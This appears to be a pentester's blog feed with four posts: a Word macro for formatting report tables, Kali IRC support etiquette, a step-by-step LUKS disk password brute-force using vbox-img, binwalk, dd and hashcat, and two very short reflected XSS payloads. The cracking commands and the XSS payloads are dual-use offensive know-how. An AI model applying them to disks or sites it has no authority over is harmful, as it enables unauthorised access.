Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2185986060583872831.post-23100286883071995482020-05-02T02:01:00.000-07:002020-05-04T06:56:15.537-07:00Pentest reporting: Making the boring faster, easier, and more professional<div class="MsoNormal">
As you know
a pentester does not live only of hacking, breaking, and destroying things. </div>
<div class="MsoNormal">
<span lang="EN-US">
After these pleasant activities, the results of your job must be prepared and presented.
<br />
This is the reporting time. Most of the technical professionals find it boring,
annoying, and repetitive. And they are right! LOL That was my motivation to
write this post.<br />
<br />
Let’s start taking a look at Serpico. </span><a href="https://github.com/SerpicoProject/Serpico"><span lang="EN-US">https://github.com/SerpicoProject/Serpico</span></a><span lang="EN-US"> <br />
The developers named it as SimplE RePort wrIting and COllaboration tool. In my judgment,
the tool is powerful and makes the tasks incredibly easier for the professional.
</span></div>
<div class="MsoNormal">
<span lang="EN-US">Unfortunately,
like any other tool, Serpico has some limitations like IF statements inside a table
in the report template. For me, it did not well. But of course, it is not a roadblock. The idea
here is to <b><span style="color: red;">not</span> </b>explain how to user Serpico, it will be your homework since the
documentation is fully available on the link above. Pay attention to how the Serpico
META Language works in depth. <br />
<br />
Also, the text editors are your allied(or enemy) to perform this task. They
also have limitations, principally when it is necessary to manipulate tables.
The Microsoft Word (in my case) is not
able to create dynamic tables, for example, table conditionally formatted.<br />
<br />
</span></div>
<div class="MsoNormal">
<span lang="EN-US">Serpico
without difficulties generates tables like that for your report:</span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;">
<tbody>
<tr>
<td style="background: #BFBFBF; border: solid windowtext 1.0pt; mso-background-themecolor: background1; mso-background-themeshade: 191; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.25pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US" style="color: #20124d;">Vulnerability name</span></div>
</td>
<td style="background: #BFBFBF; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: background1; mso-background-themeshade: 191; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.25pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span style="color: #20124d;"><span lang="EN-US">Impact</span><span lang="EN-US"></span></span></div>
</td>
<td style="background: #BFBFBF; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: background1; mso-background-themeshade: 191; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.3pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US" style="color: #20124d;">Exploitability</span><span lang="EN-US"></span></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.25pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">SQL Injection</span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.25pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">4</span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.3pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">3</span></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.25pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">Command Injection</span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.25pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">4</span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.3pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">4</span></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.25pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">Server Information Leak</span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.25pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">1</span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.3pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">8</span></div>
</td>
</tr>
</tbody></table>
<div class="MsoNormal">
<span lang="EN-US" style="color: white; mso-ansi-language: EN-US; mso-color-alt: windowtext;"><br />
</span><span lang="EN-US">Serpico stores the Impact/Risk
and exploitability as numbers, from 0 Informational to 4 Critical. <br /><br />But some times the template approved by your customer/company requires the impact, and the
exploitability(whatever) must be the word related to the number. For example, the impact 4
must be the word Critical, and the exploitability 8 must be Very Easy. Also,
the cell must be colored accordingly to a predetermined rate like impact 1, the
cell must be blue, and exploitability 8 must be green. </span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">For this given table, making these
changes are easy, but imagine if you have a table with dozen vulnerabilities. Coloring
these cells, and change the text becomes boring and annoying.<br />
<br />
To solve it, a macro is required. <br />
<br />
Sub colourExploitability()</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">Dim ce As Word.Cell</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">If
Selection.Information(wdWithInTable) Then</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">
For Each ce In Selection.Tables(1).Range.Cells</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">
If IsNumeric(Left(ce.Range.Text, Len(ce.Range.Text) - 1)) And
(ce.Range.Italic) Then</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">
If Val(ce.Range.Text) = 5 Then</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> ce.Shading.BackgroundPatternColor =
RGB(192, 0, 0)</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> ce.Range.Text = "Very Easy(5)"</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">
End If</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">
If Val(ce.Range.Text) = 4 Then</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> ce.Shading.BackgroundPatternColor =
wdColorRed</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> ce.Range.Text = "Easy(4)"</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">
End If</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">
If Val(ce.Range.Text) = 3 Then</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> ce.Shading.BackgroundPatternColor =
wdColorOrange</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> ce.Range.Text = "Moderate(3)"</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">
End If</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">
If Val(ce.Range.Text) = 2 Then</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> ce.Shading.BackgroundPatternColor =
RGB(146, 208, 80)</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> ce.Range.Text = "Difficult(2)"</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">
End If</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">
If Val(ce.Range.Text) = 1 Then</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> ce.Shading.BackgroundPatternColor =
wdColorGreen</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> ce.Range.Text = "Very
Difficult(1)"</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">
End If</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> If Val(ce.Range.Text) > 5 Then</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> ce.Shading.BackgroundPatternColor =
wdColorBlue</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> ce.Range.Text = "WRONG VALUE"</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">
End If</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">
End If</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">
Next</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">End If</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">End Sub</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">Basically what this macro does is: <br />
<br />
Sweeping the table<br />
<br />
Check if the cell is numeric and italic ( My conditions. Of course, you can
change it) </span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">If IsNumeric(Left(ce.Range.Text,
Len(ce.Range.Text) - 1)) And (<b><span style="color: red;">ce.Range.Italic</span></b>) <br />
<br />
Check if the number matches my other condition.</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> If Val(ce.Range.Text) = 5<br />
<br />
If matched, it changes the cell value and background-color.<br />
ce.Shading.BackgroundPatternColor = <b><span style="color: red;">RGB(192,
0, 0)</span></b></span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> ce.Range.Text = "Very Easy(5)"<br />
<br />
Notice the BackgroundPatternColor it’s possible to use RGB colors as above or
predefined colors listed here: </span><a href="https://docs.microsoft.com/en-us/dotnet/api/microsoft.office.interop.word.wdcolor?view=word-pia"><span lang="EN-US">https://docs.microsoft.com/en-us/dotnet/api/microsoft.office.interop.word.wdcolor?view=word-pia</span></a><br />
<br />
<br />
<span lang="EN-US"></span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">Save the macro and create a shortcut
to execute it. Click on the table, press the shortcut, and see the magic
happens. <br />
<br />
</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">Another tip to make your job faster
is to Create Drop-Down List Content Controls. <br />
By default, it's not possible to add custom fields to Serpico. For example, if
you need to add an OWASP category to each vulnerability. <br />
<br />
After you create this control and position it in the right place(in the
template), Serpico will generate it for each vulnerability you have added to
the report. You just need to select the proper category after the report being
generated.<br />
<br />
</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">If you are looking for more professional
documents, my friend Julio created a really great repository of public reports.
</span><span lang="EN-US"><a href="https://github.com/juliocesarfort/public-pentesting-reports">https://github.com/juliocesarfort/public-pentesting-reports</a></span> <span lang="EN-US"></span><br />
<br />
Also, thanks to my other friend Pedro, he added a chart feature, as Serpico is open source.<br /><a href="https://www.linkedin.com/in/pedro-cavalcante-975a61b3">https://www.linkedin.com/in/pedro-cavalcante-975a61b3</a><br /></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US" style="color: red;"><b>Conclusion:</b></span></div>
<span lang="EN-US" style="font-family: inherit; line-height: 107%;">After some time using Serpico and applying these
tricks, it's possible to reduce between 60-80% of the time reporting. It means
this time can be converted to more cool activities like destroying some applications.
</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-37586632231037711092020-04-09T07:29:00.003-07:002020-04-10T01:13:25.925-07:00Kali Linux Troubleshooting – Is my issue Kali related, generic issue, or lack of knowledge?<br />
If you are reading this post, I presume you are a security professional or at least wanna be one. If you want to start in security please refer to this post http://blog.dclabs.com.br/2016/05/wanna-be-pentester.html In this post, I will give you some tips to understand if the issue you are facing while running Kali is related to Kali, generic, or lack of knowledge issues. Also, this post is based on statistics from the Kali IRC channel. More than 75% of the questions asked on the channel are not Kali related.<br />
<br />
<br />
First of all, you must understand the Kali support policy: <br />
<br />
“While Kali Linux is a Penetration Testing Linux distribution, we do not provide penetration testing support, or even tool usage support, as some might expect. We limit our support to Kali Linux operating system and packaging issues and encourage users to search for answers to their penetration testing related issues in better suited support channels.”<br />
Source: https://www.kali.org/community/<br />
<br />
To be clear from the beginning: <b><span style="color: red;">Just because you are running Kali, it does not mean your issues are Kali related</span></b>. The people are on the channel to help you for free. So, don't be an idiot.<br />
<br />
As you can notice if you don’t know how to use some tool, its not a Kali issue. Check the tool documentation. If you are too lazy to read it, jump off the boat right now. To be a good security professional there are no shortcuts. Get your ass on the chair and read! <br />
<br />
As you should know, Kali is based on Debian testing(and maybe some packages may be imported from Debian Unstable and/or Debian Experimental). In this case, it is a good idea to keep a Debian testing machine installed on your VMware/Vbox. The main reason for keeping it is: If the issues are reproducible in Debian testing, it's clear, it's not Kali specific issue. <br />
<br />
Following some examples of questions to clear your mind before asking for help on official Kali channels: <br />
<br />
<b>"I'm new on Kali, how to..." </b><br />
<br />
It does not matter if you are new to Kali. The only thing that matters is if you are familiar with Linux itself or not. If not: <a href="https://kali.training/">https://kali.training</a><br />
<br />
<b>"I'm trying to install libpXYX:i386, but I get unable to locate the package. The libpXYZ seems to already be installed. How can I install the 32-bit version?" </b><br />
<br />
As you can see, it's a lack of knowledge using dpkg and apt commands. Googling the string apt add i386 architecture, the first result will give a step-by-step how to fix it. <b><span style="color: red;">So, IT'S NOT A KALI ISSUE.</span></b> <br />
<br />
<b>"Hello, I would like to analyze the incoming RDP connection on my server. How should I do?" </b><br />
<br />
It's more than clear that this question should be asked in some network forum/channel and not in the Kali channel. Kali has nothing to deal with your incoming connections. <b><span style="color: red;">So, IT'S NOT A KALI ISSUE. </span></b><br />
<br />
<b>"Hi, when I run arachni it hangs before start scanning and shows some library errors. I have tested in other distros like Ubuntu, Debian and it works fine." </b><br />
<span style="color: blue;">This case seems to be a Kali issue since it happens <b>ONLY</b> in Kali! </span><br />
<br />
<b>"What is the Nmap command to enumerate shared folders?" </b><br />
<br />
As explained at the beginning of the post, "...we do not provide penetration testing support, or even tool usage support..." <b><span style="color: red;">So, IT'S NOT A KALI ISSUE. </span></b><br />
<br />
<b>"Is my wifi card Alfa Xyz123 supported by Kali?" </b><br />
<br />
As explained before, Kali is based on Debian testing. You must check if Debian supports it.<br />
<b><span style="color: blue;">If somehow, your driver works in Debian and not in Kali, then you have a Kali issue</span></b>, otherwise, <b><span style="color: red;">IT'S NOT A KALI ISSUE</span></b>.<br />
<br />
<b>"The copy and paste is not working in Kali running in Virtualbox"</b><br />
<br />
Is it not working only for Kali or to all other VM's also?<br />
<br />
<b>"When I execute the Metasploit against the target the shell does not open.",</b><br />
<b>How to create a user, how to change password, how to change to the text terminal, how to execute the tool, how to install..., how to remove..., how to update, the av is blocking...</b><br />
<br />
All these above questions are not relevant to be asked on the Kali official channel since they are generic Linux questions. Kali indeed has all the setup and security tools, but in the end, it's a just Linux based on Debian. <br />
<br />
If you know how to use Linux properly, these questions will disappear from your mind. <br />
<br />
<b>The best way to ask:</b><br />
But, before asking, make sure you have googled it and spent a good amount of time researching for the solution or answer you are looking for.<br />
<br />
After that, provide detailed information, like steps to reproduce the issue, errors, logs (use Pastebin for it), kernel version, tool version and etc.<br />
<br />
I guess you know how to proceed from here. (:<br />
<div style="box-sizing: border-box; font-family: "akkurat std", sans-serif; font-size: 17px; white-space: pre-wrap;">
<div style="box-sizing: border-box; color: #0e101a;">
</div>
</div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-2185986060583872831.post-17755065837122790002020-03-10T04:48:00.002-07:002020-03-19T01:14:39.058-07:00Bruteforcing Linux Disk Encryption (LUKS)Hi guys!
I decided to write this article for a few reasons. <br />
Several Bruteforcing Linux Disk Encryption articles are unclear, not accurate, and missing steps. <br />
<br />
To start this post, I will describe a scenario that happened a few months ago. <br />
An unsatisfied IT contractor encrypted all virtualized servers from a company and asked for the ransom. <br />
<br />
So let's start with the technical part. <br />
<br />
First of all, you need to recognize the hypervisor used by the virtualized machine since the disk is not in RAW format. Each hypervisor has a different command to perform this action. In this case, let's suppose it was VirtualBox. If you try to crack the password directly running the hashcat against the VDI file even following the hashcat documentation, it won't work.<br />
<br />
You need to convert the VDI file in the RAW format first(VBox 6.1): <br />
<br />
<b>vbox-img convert --dstfilename "<fullptah_of_ouputfile_disk.raw>" --srcfilename "<fullpath_of_encripted_file.vdi>" --srcformat VDI --dstformat RAW --variant Standard
</b><br />
<br />
*Depending on the disk size, it can take a long time to finish, and there is no progress indicator during the process. You must wait until the prompt is released.<br />
<br />
Now, let's extract the encrypted partition(LUKS) from the RAW disk.<br />
<br />
<b>binwalk -D 'luks_magic:lukspartiton.raw:' disk.raw</b><br />
<br />
*Depending on the disk size, it can take a long time to finish, and there is no progress indicator during the process. You must wait until the prompt is released or check if the file created by binwalk already has more than 2 megabytes. As the extraction is quite fast probably you are going to see a big file, it's not a problem.<br />
<br />
The binwalk will create a directory named _disk.raw.extracted, inside this directory, where you can find the extracted file, the name should be something like F500000.lukspartiton.raw<br />
<br />
After this process, according to the documentation, hashcat needs about 2 megabytes to identify everything it needs to crack the password. 512 blocks of 4097 bytes, or i<span style="letter-spacing: 0px;">n other words, at least </span>2097664<span style="letter-spacing: 0px;"> bytes from the beginning of the RAW partition disk are required. (Reference: </span><a href="https://hashcat.net/forum/thread-6225.html" style="letter-spacing: 0px;">https://hashcat.net/forum/thread-6225.html</a>)<br />
<br />
<span style="letter-spacing: 0px;">You can generate this piece of the file using the famous Linux command dd, but you also can use tools like FTK or any other tool able to manipulates disk files and extract the LUKS partition. Just make sure if the generated file has the appropriate headers and size at the end of the process.</span><br />
<b><br />dd if=F500000.lukspartiton.raw of=encriptedheader.crack bs=512 count=4097</b><span style="letter-spacing: 0px;">
</span><br />
<span style="letter-spacing: 0px;"><br />To check if your piece of file image is ready to be cracked, you can use the Linux command "file" or check with some Hex editor for the strings LUKS.
</span><br />
<b><br />root@Anubis:/cript# file encriptedheader.crack
</b><i><span style="letter-spacing: 0px;">encriptedheader.crack</span><span style="letter-spacing: 0px;">: LUKS encrypted file, ver 2 [, , sha256] UUID: XXXXXXXX-3d7f-4760-aec6-XXXXXXXXXXXX
</span></i><span style="letter-spacing: 0px;"><br /><br />Also, you can check running the "strings" command</span>. The expected return should be like the following:
<br />
<b><br />root@Anubis:/cript# strings encriptedheader.crack | grep -i luks
LUKS</b>
<br />
<i>{"keyslots":{"0":{"type":"luks2","key_size":64,"af":{"type":"luks1","stripes":4000,"hash":"sha256"},"area":{"type":"raw","offset":"32768","size":"258048","encryption":"aes-xts-plain64","key_size":64},"kdf":{"type":"argon2i","time":4,"memory":713834,"cpus":2,"salt":"<REDACTED>"}}},"tokens":{},"segments":{"0":{"type":"crypt","offset":"16777216","size":"dynamic","iv_tweak":"0","encryption":"aes-xts-plain64","sector_size":512}},"digests":{"0":{"type":"pbkdf2","keyslots":["0"],"segments":["0"],"hash":"sha256","iterations":65997,"salt":"<REDACTED>","digest":"<REDACTED>"}},"config":{"json_size":"12288","keyslots_size":"16744448"}}
{"keyslots":{"0":{"type":"luks2","key_size":64,"af":{"type":"luks1","stripes":4000,"hash":"sha256"},"area":{"type":"raw","offset":"32768","size":"258048","encryption":"aes-xts-plain64","key_size":64},"kdf":{"<span style="background-color: white;">type</span>":"<span style="background-color: white;">argon2i</span>","time":4,"memory":713834,"cpus":2,"salt":"<REDACTED>"}}},"tokens":{},"segments":{"0":{"type":"crypt","offset":"16777216","size":"dynamic","iv_tweak":"0","<span style="background-color: white;">encryption</span>":"<span style="background-color: white;">aes-xts-plain64</span>","sector_size":512}},"digests":{"0":{"<span style="background-color: white;">type</span>":"<span style="background-color: white;">pbkdf2</span>","keyslots":["0"],"segments":["0"],"<span style="background-color: white;">hash</span>":"<span style="background-color: white;">sha256</span>","iterations":65997,"salt":"<REDACTED>","digest":"<REDACTED>"}},"config":{"json_size":"12288","keyslots_size":"16744448"}}</i><br />
<br />
At this point, if you have read the documentation, you can recognize if the hashcat supports <span style="letter-spacing: 0px;">the disk encryption </span><span style="letter-spacing: 0px;">by checking the parameters '</span><span style="letter-spacing: 0px;">encryption,' 'type,' and 'hash' from the strings command output.</span><span style="letter-spacing: 0px;">
</span><br />
Double-checking the file size before starting the Bruteforce.
<br />
<span style="letter-spacing: 0px;"><br /><b>root@Anubis:cript# ls -al </b></span>
<br />
<i>total 4604 </i><br />
<i>drwxrwx--- 1 root vboxsf 0 Mar 10 2020 . </i><br />
<i>drwxr-xr-x 3 root root 4096 Feb 23 22:00 .. </i><br />
<i>-rwxrwx--- 1 root vboxsf <span style="background-color: white;">2097664</span> Mar 10 2020 encriptedheader.crack </i><br />
<span style="letter-spacing: 0px;"><br /></span>
<span style="letter-spacing: 0px;">
Now you are sure and ready to start the cracking. </span><br />
<span style="letter-spacing: 0px;"><br />I used this syntax for hashcat, but of course, you can change according to your needs.
</span><br />
<b><br />hashcat -m 14600 -O -a 0 -w 3 encriptedheader.crack example.dict<span style="letter-spacing: 0px;"> -o crackedpass.txt</span></b><br />
<span style="letter-spacing: 0px;"><br /></span>
<span style="letter-spacing: 0px;">If everything is fine, you will see this output.</span>
hashcat (v5.1.0) starting...<br />
<br />
* Device #1: WARNING! Kernel exec timeout is not disabled.<br />
This may cause "CL_OUT_OF_RESOURCES" or related errors.<br />
To disable the timeout, see: https://hashcat.net/q/timeoutpatch<br />
* Device #2: Intel's OpenCL runtime (GPU only) is currently broken.<br />
We are waiting for updated OpenCL drivers from Intel.<br />
You can use --force to override, but do not report related errors.<br />
nvmlDeviceGetFanSpeed(): Not Supported<br />
<br />
OpenCL Platform #1: NVIDIA Corporation<br />
======================================<br />
* Device #1: GeForce MX130, 512/2048 MB allocatable, 3MCU<br />
<br />
OpenCL Platform #2: Intel(R) Corporation<br />
========================================<br />
* Device #2: Intel(R) UHD Graphics 620, skipped.<br />
* Device #3: Intel(R) Core(TM) i7-8565U CPU @ 1.80GHz, skipped.<br />
<br />
Hashes: 1 digests; 1 unique digests, 1 unique salts<br />
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates<br />
Rules: 1<br />
<br />
Applicable optimizers:<br />
* Zero-Byte<br />
* Single-Hash<br />
* Single-Salt<br />
* Slow-Hash-SIMD-LOOP<br />
<br />
Minimum password length supported by kernel: 0<br />
Maximum password length supported by kernel: 256<br />
<br />
Watchdog: Temperature abort trigger set to 90c<br />
<br />
Dictionary cache hit:<br />
* Filename..: example.dict<br />
* Passwords.: 128416<br />
* Bytes.....: 1069601<br />
* Keyspace..: 128416<br />
<br />
Cracking performance lower than expected?<br />
<br />
* Update your OpenCL runtime / driver the right way:<br />
https://hashcat.net/faq/wrongdriver<br />
<br />
* Create more work items to make use of your parallelization power:<br />
https://hashcat.net/faq/morework<br />
<br />
<br />
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =><br />
<br />
Session..........: hashcat<br />
Status...........: Running<br />
<span style="background-color: white;">Hash.Type........: LUKS</span><br />
Hash.Target......: encriptedheader.crack<br />
Time.Started.....: Tue Mar 10 12:31:13 2020 (23 secs)<br />
Time.Estimated...: Tue Mar 10 12:51:19 2020 (19 mins, 43 secs)<br />
Guess.Base.......: File (example.dict)<br />
Guess.Queue......: 1/1 (100.00%)<br />
Speed.#1.........: 107 H/s (4.22ms) @ Accel:2 Loops:256 Thr:64 Vec:1<br />
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts<br />
Progress.........: 2304/128416 (1.79%)<br />
Rejected.........: 0/2304 (0.00%)<br />
Restore.Point....: 2304/128416 (1.79%)<br />
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:45312-45568<br />
Candidates.#1....: 0611soep -> 078112025<br />
Hardware.Mon.#1..: Temp: 70c Util: 98% Core:1032MHz Mem:2505MHz Bus:4<br />
<br />
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =><br />
<br />
<br />
Otherwise, if you receive the error:<br />
<br />
Hashfile 'encriptedheader.crack': Invalid LUKS version<br />
No hashes loaded.<br />
<br />
It indicates the file was not created properly. <span style="font-size: 1.0625rem; letter-spacing: 0px;">Double-check the file size and the headers</span><span style="font-size: 1.0625rem; letter-spacing: 0px;">. </span><br />
Or, the hashcat is not compatible with the LUKS version that the disk was encrypted with.<br />
<br />
<span style="letter-spacing: 0px;">Have a nice cracking!</span><br />
<br /><br />UPDATE:<br />You can limit binwalk's output using `--size $((2**22))` and make it halt on the first match with `--count 1`. I also recommend using `qemu-img dd` to limit how much of the input image you process.<br /><br />Tip from: https://twitter.com/PEdrArthur<br />
<span style="font-size: 1.0625rem; letter-spacing: 0px;"> </span><span style="font-size: 1.0625rem; letter-spacing: 0px;">
</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-3991672218382726192017-08-02T03:43:00.000-07:002018-07-25T02:47:45.018-07:00Super Short XSS payloadHi Guys!<br />
<br />
Some time ago we were testing an application and we found very limited reflected XSS vuln injecting straight into the page and we had only 22 chars to exploit that.<br />
<br />
After some testing, the following payload worked very well:<br />
<svg/onload=alert(1)> or <svg onload=alert(1)><br />
<br />
This <svg> payload has 21 chars, but we still not happy with the size.<br />
<br />
Checking the HTML doc it was possible to find the function oncut, obviously, it has fewer chars than onload.<br />
Well, as the function name oncut is quite clear, we need something to cut on the web page.<br />
So, a small HTML tag that accepts text is <p>.<br />
<br />
In this case, the payload will be the following:<br />
<p/oncut=alert(1)>A or <p oncut=alert(1)>A<br />
<br />
Bingo! We have a functional XSS payload with 19 chars. \o/<br />
